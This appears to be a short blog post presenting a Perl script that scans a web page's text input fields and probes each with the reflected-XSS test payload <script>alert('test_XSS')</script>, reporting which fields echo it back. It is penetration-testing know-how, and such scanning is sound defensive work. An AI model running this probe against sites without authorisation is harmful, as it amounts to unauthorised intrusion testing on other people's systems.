Today I wrote a simple Perl script to automatically discover XSS vulnerabilities in a web application.
This script can be improved to make it more suitable for use in a web penetration test.
The code follows:
#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;
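# Target as typed on the command line; the scheme is prepended because the
# usage text expects a bare host such as "example.com".
if (@ARGV < 1) {
    usage();
}
my $url = "http://" . $ARGV[0];

# Fetch the page.  LWP::Simple::get returns undef on any failure (DNS,
# connection, non-2xx status); the original flow then split undef and reported
# "no search boxes", so a transport problem looked like a negative result.
# Fail loudly instead.
my $webpage = get($url);
die "Could not fetch $url\n" unless defined $webpage;

# One line per element so each <input> is matched on its own.
my @webpage = split(/\n/, $webpage);

# Collect the name attribute of every <input type="text" name="..."> that uses
# exactly this attribute order, spacing and double quoting; other markup forms
# are not recognised and are skipped.
my @name;
foreach my $line (@webpage) {
    if ($line =~ /input\stype="text"\sname="(\w{1,30})"/) {
        push(@name, $1);
    }
}

if (@name) {
    print "I've found the following search box:\n";
    foreach my $field (@name) {
        print "$field\n";
    }
    print "and I've discovered that:\n";

    # Send the probe through each field as a GET parameter and look for it
    # verbatim in the response.  A verbatim echo shows the value is rendered
    # without output encoding; a non-match only means this single probe was
    # not reflected as-is, not that the parameter is safe.  A failed request
    # is reported separately rather than counted as "not vulnerable".
    foreach my $field (@name) {
        my $result = get($url . "?" . $field . "=<script>alert('test_XSS')</script>");
        if (!defined $result) {
            print "$field could not be tested (request failed)\n";
        }
        elsif ($result =~ /<script>alert\('test_XSS'\)<\/script>/) {
            print "$field is vulnerable to XSS\n";
        }
        else {
            print "$field isn't vulnerable to XSS\n";
        }
    }
}
else {
    print "I have not found search boxes in " . $ARGV[0] . "\n";
}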
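# Print the command-line synopsis to STDOUT and exit.  Called when no target
# argument was given.  The empty prototype "()" the original declared performs
# no argument validation (and is only checked at call sites compiled after the
# declaration), so it is dropped; the existing usage() call is unaffected.
sub usage {
    print "Usage: $0 <url>\n";
    print "Example: $0 ivanobinetti.com\n";
    exit;
}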